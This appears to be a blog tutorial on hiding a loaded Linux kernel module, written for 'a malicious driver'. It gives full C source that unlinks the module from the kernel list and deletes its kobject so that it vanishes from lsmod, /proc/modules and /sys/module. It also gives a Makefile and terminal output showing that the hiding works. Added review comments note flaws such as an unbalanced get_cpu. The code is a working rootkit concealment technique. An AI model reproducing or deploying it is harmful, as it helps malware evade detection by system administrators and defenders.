Linux hidden driver module

A malicious driver naturally wants its module to go unnoticed after loading. To hide the installed module, unlink it from the module list at the driver's initialization entry and delete the current module's kobject with the kobject_del() function, so that it no longer appears in lsmod and is hidden in /sys/module.

list_del_init(&__this_module.list);

test.c

#include <linux/module.h>

/* Module metadata (license, author, description, version) as reported by modinfo. */
MODULE_LICENSE("GPL"); 
MODULE_AUTHOR("curtis li");/* author */
MODULE_DESCRIPTION("HELLO");
MODULE_VERSION("1.0");// version number

   /*
    * Load-time entry point. Logs this module's identity and state, walks the
    * module list printing every module name, then unlinks this module from the
    * global module list and deletes its kobject, so the module is no longer
    * reported by lsmod / /proc/modules or under /sys/module.
    *
    * Returns 0 (the module stays loaded).
    *
    * NOTE(review): the module's code and data remain resident after this;
    * only its bookkeeping entries are removed.
    */
   static int hello_init(void)
    {
    
    
        /* NOTE(review): get_cpu() disables preemption and there is no matching
         * put_cpu() anywhere in this function — confirm whether leaving
         * preemption disabled after init returns is intended. */
        unsigned int cpu = get_cpu();
        printk("-----%d-----\n",cpu);
        struct module *mod;
        printk(KERN_ALERT "this module: %p==%p\n", &__this_module, THIS_MODULE );
        printk(KERN_ALERT "module state: %d\n", THIS_MODULE->state );
        printk(KERN_ALERT "module name: %s\n", THIS_MODULE->name );
        printk(KERN_ALERT"module version:%s\n",THIS_MODULE->version);
        /* Walk every module on the list and print its name; inspect with dmesg.
         * The head passed here, *(&THIS_MODULE->list.prev), is simply
         * THIS_MODULE->list.prev, i.e. the entry linked before this module. */
        list_for_each_entry(mod, *(&THIS_MODULE->list.prev), list )
        printk(KERN_ALERT "module name: %s\n", mod->name );
        /* Unlink this module from the global module list. This is what removes
         * it from lsmod and /proc/modules. No lock is taken around the unlink
         * in the visible code. */
        list_del_init(&__this_module.list);
        /* Delete the current module's kobject; this removes the /sys/module entry. */
        kobject_del(&THIS_MODULE->mkobj.kobj);
        return 0;
    }
 
    /*
     * Unload hook: logs the module's current state and a farewell message.
     * Nothing is undone here — the list unlink and kobject deletion performed
     * at load time are not reversed.
     */
    static void hello_exit(void)
    {
        const struct module *self = THIS_MODULE;

        printk(KERN_ALERT "module state: %d\n", self->state );
        printk("find_module bye...\n");
    }
 
/* Register hello_init as the load-time entry and hello_exit as the unload hook. */
module_init(hello_init);
module_exit(hello_exit);

Makefile:

# Out-of-tree kernel module build. The outer branch (KERNELRELEASE unset) is
# what a user runs; it re-invokes make inside the kernel build tree, which then
# takes the inner branch to pick up obj-m.
# NOTE(review): CONFIG_MODULE_SIG=n here only affects this Makefile; whether the
# running kernel enforces module signatures is decided by the kernel's own
# configuration, not by this line.
CONFIG_MODULE_SIG=n

ifeq ($(KERNELRELEASE),)

ROOTS_DIR = /root/
# Kernel source path; it may differ per environment. The kernel source must be built first.
KERNEL_DIR = /lib/modules/$(shell uname -r)/build
CUR_DIR = $(shell pwd)

# NOTE(review): make recipe lines must be indented with a tab; the two-space
# indentation shown here may be a copy/paste artifact — verify before use.
all: 
  make -C $(KERNEL_DIR) M=$(CUR_DIR) modules
clean :
  make -C $(KERNEL_DIR) M=$(CUR_DIR) clean
install:
  insmod test.ko
uninstall:
  rmmod test
    
else
# Selects which source file is built -- hello.c (the object listed below is test.o)
obj-m += test.o
#obj-m += math.o
endif

After the driver is loaded, you can use lsmod to check whether it was installed successfully; the module's name after installation is the name of the .ko file.

curtis@curtis-virtual-machine:~/Desktop/test$ lsmod | grep test
curtis@curtis-virtual-machine:~/Desktop/test$ 

Besides the lsmod command and the /proc/modules file it reads from, you can also list the existing modules by viewing the /sys/module/ directory.

curtis@curtis-virtual-machine:~/Desktop/test$ ls
Makefile  modules.order  Module.symvers  test.c  test.ko  test.mod  test.mod.c  test.mod.o  test.o
curtis@curtis-virtual-machine:~/Desktop/test$ ls /sys/module/ | grep test


Origin blog.csdn.net/qq_42931917/article/details/108485984